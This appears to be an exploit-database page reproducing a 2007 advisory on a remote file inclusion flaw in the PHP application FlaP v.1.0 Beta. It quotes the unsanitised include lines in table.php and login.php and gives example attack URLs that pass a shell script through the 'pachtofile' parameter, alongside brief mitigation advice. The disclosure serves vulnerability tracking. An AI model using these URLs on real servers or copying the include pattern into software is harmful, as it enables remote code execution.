FlaP v.1.0. Beta - exploit.company

vendor:

FlaP v.1.0. Beta

by:

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: FlaP v.1.0. Beta

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

FlaP v.1.0. Beta <= Remote File Inclusion Vulnerability

The FlaP v.1.0. Beta application is vulnerable to remote file inclusion, allowing an attacker to include and execute arbitrary files on the server. This vulnerability can be exploited by providing a malicious file path as a parameter in the affected PHP files (skin/html/table.php and login.php). The vulnerable code snippets in these files use the 'include' function to include the specified file without proper sanitization or validation.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques. The application should validate user-supplied file paths and ensure that they are limited to the intended directory. Additionally, the 'include' function should be used with caution and only include trusted files.

Source

Exploit-DB raw data:

##############################################################################################
# FlaP v.1.0. Beta  <=  Remote File Inclusion Vulnerability                                  #
#                                                                                            #

#                                                                                            #
##############################################################################################
#Vuln Code                                                                                   #  

#                                                                                            # 
#ERROR1:skin/html/table.php                                                                  # 
#                                                                                            # 

# <? include "$pachtofile/left_menu.php"; <<< RFI CODE                                       # 
#                                                                                            # 

#                                                                                            # 
#BUG1:                                                                                       # 
#                                                                                            # 

#Example1:http://victim.com/path/skin/html/table.php?pachtofile=[[Sh3LL Script]]             #
##############################################################################################

#                                                                                            # 
#ERROR2:login.php                                                                            # 
#                                                                                            # 

#<? include "$pachtofile/right_menu.php"; ?></ <<< RFI CODE                                  #
#                                                                                            # 

#                                                                                            # 
#BUG2:                                                                                       # 
#                                                                                            # 

#Example1:http://victim.com/path/login.php?pachtofile=[[Sh3LL Script]]                       #
##############################################################################################


##############################################################################################
#                                                                                            # 
#Script Download                                                                             # 

##############################################################################################
#                                                                                            # 
#http://scripts.protoplex.ru/scripts_show/1854.html                                          # 

#                                                                                            # 
##############################################################################################
#                                                                                            # 

#Cyber-Security                                                                              # 
#                                                                                            # 
##############################################################################################

# milw0rm.com [2007-05-25]